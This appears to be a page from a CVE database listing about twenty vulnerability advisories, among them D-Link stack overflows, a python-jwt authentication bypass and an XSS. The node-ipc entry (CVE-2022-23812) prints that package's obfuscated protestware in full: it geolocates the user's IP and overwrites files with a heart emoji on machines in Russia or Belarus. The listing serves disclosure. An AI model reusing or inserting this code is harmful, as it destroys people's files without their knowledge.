Total
210374 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2019-3629 | 1 Mcafee | 1 Enterprise Security Manager | 2023-03-03 | 4.3 MEDIUM | 6.5 MEDIUM |
| Application protection bypass vulnerability in McAfee Enterprise Security Manager (ESM) prior to 11.2.0 and prior to 10.4.0 allows unauthenticated user to impersonate system users via specially crafted parameters. | |||||
| CVE-2022-23081 | 1 Openlibrary | 1 Openlibrary | 2023-03-03 | 4.3 MEDIUM | 6.1 MEDIUM |
| In openlibrary versions deploy-2016-07-0 through deploy-2021-12-22 are vulnerable to Reflected XSS. | |||||
| CVE-2022-39227 | 1 Python-jwt Project | 1 Python-jwt | 2023-03-03 | N/A | 9.1 CRITICAL |
| python-jwt is a module for generating and verifying JSON Web Tokens. Versions prior to 3.3.4 are subject to Authentication Bypass by Spoofing, resulting in identity spoofing, session hijacking or authentication bypass. An attacker who obtains a JWT can arbitrarily forge its contents without knowing the secret key. Depending on the application, this may for example enable the attacker to spoof other user's identities, hijack their sessions, or bypass authentication. Users should upgrade to version 3.3.4. There are no known workarounds. | |||||
| CVE-2020-24588 | 8 Arista, Cisco, Debian and 5 more | 350 C-100, C-100 Firmware, C-110 and 347 more | 2023-03-03 | 2.9 LOW | 3.5 LOW |
| The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that the A-MSDU flag in the plaintext QoS header field is authenticated. Against devices that support receiving non-SSP A-MSDU frames (which is mandatory as part of 802.11n), an adversary can abuse this to inject arbitrary network packets. | |||||
| CVE-2022-24588 | 1 Flatpress | 1 Flatpress | 2023-03-03 | 3.5 LOW | 5.4 MEDIUM |
| Flatpress v1.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability in the Upload SVG File function. | |||||
| CVE-2022-23812 | 1 Node-ipc Project | 1 Node-ipc | 2023-03-03 | 10.0 HIGH | 9.8 CRITICAL |
| This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }; | |||||
| CVE-2023-24212 | 1 Tenda | 2 Ax3, Ax3 Firmware | 2023-03-03 | N/A | 9.8 CRITICAL |
| Tenda AX3 V16.03.12.11 was discovered to contain a stack overflow via the timeType function at /goform/SetSysTimeCfg. | |||||
| CVE-2021-39617 | 2023-03-03 | N/A | N/A | ||
| ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. | |||||
| CVE-2022-46570 | 1 Dlink | 2 Dir-882 A1, Dir-882 A1 Firmware | 2023-03-03 | N/A | 7.2 HIGH |
| D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Password parameter in the SetWan3Settings module. | |||||
| CVE-2022-46569 | 1 Dlink | 2 Dir-882 A1, Dir-882 A1 Firmware | 2023-03-03 | N/A | 7.2 HIGH |
| D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Key parameter in the SetWLanRadioSecurity module. | |||||
| CVE-2022-46568 | 1 Dlink | 2 Dir-882 A1, Dir-882 A1 Firmware | 2023-03-03 | N/A | 7.2 HIGH |
| D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the AccountPassword parameter in the SetSysEmailSettings module. | |||||
| CVE-2022-46566 | 1 Dlink | 2 Dir-882 A1, Dir-882 A1 Firmware | 2023-03-03 | N/A | 7.2 HIGH |
| D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Password parameter in the SetQuickVPNSettings module. | |||||
| CVE-2022-46563 | 1 Dlink | 2 Dir-882 A1, Dir-882 A1 Firmware | 2023-03-03 | N/A | 7.2 HIGH |
| D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Password parameter in the SetDynamicDNSSettings module. | |||||
| CVE-2022-46562 | 1 Dlink | 2 Dir-882 A1, Dir-882 A1 Firmware | 2023-03-03 | N/A | 7.2 HIGH |
| D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the PSK parameter in the SetQuickVPNSettings module. | |||||
| CVE-2022-46561 | 1 Dlink | 2 Dir-882 A1, Dir-882 A1 Firmware | 2023-03-03 | N/A | 7.2 HIGH |
| D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Password parameter in the SetWanSettings module. | |||||
| CVE-2022-46560 | 1 Dlink | 2 Dir-882 A1, Dir-882 A1 Firmware | 2023-03-03 | N/A | 7.2 HIGH |
| D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Password parameter in the SetWan2Settings module. | |||||
| CVE-2022-37130 | 1 Dlink | 2 Dir-816, Dir-816 Firmware | 2023-03-03 | N/A | 9.8 CRITICAL |
| In D-Link DIR-816 A2_v1.10CNB04, DIR-878 DIR_878_FW1.30B08.img a command injection vulnerability occurs in /goform/Diagnosis, after the condition is met, setnum will be spliced into v10 by snprintf, and the system will be executed, resulting in a command injection vulnerability | |||||
| CVE-2022-36620 | 1 Dlink | 2 Dir-816, Dir-816 Firmware | 2023-03-03 | N/A | 7.5 HIGH |
| D-link DIR-816 A2_v1.10CNB04, DIR-878 DIR_878_FW1.30B08.img is vulnerable to Buffer Overflow via /goform/addRouting. | |||||
| CVE-2018-20177 | 3 Debian, Opensuse, Rdesktop | 4 Debian Linux, Backports, Leap and 1 more | 2023-03-03 | 7.5 HIGH | 9.8 CRITICAL |
| rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in the function rdp_in_unistr() and results in memory corruption and possibly even a remote code execution. | |||||
| CVE-2018-11803 | 2 Apache, Canonical | 2 Subversion, Ubuntu Linux | 2023-03-03 | 5.0 MEDIUM | 7.5 HIGH |
| Subversion's mod_dav_svn Apache HTTPD module versions 1.11.0 and 1.10.0 to 1.10.3 will crash after dereferencing an uninitialized pointer if the client omits the root path in a recursive directory listing operation. | |||||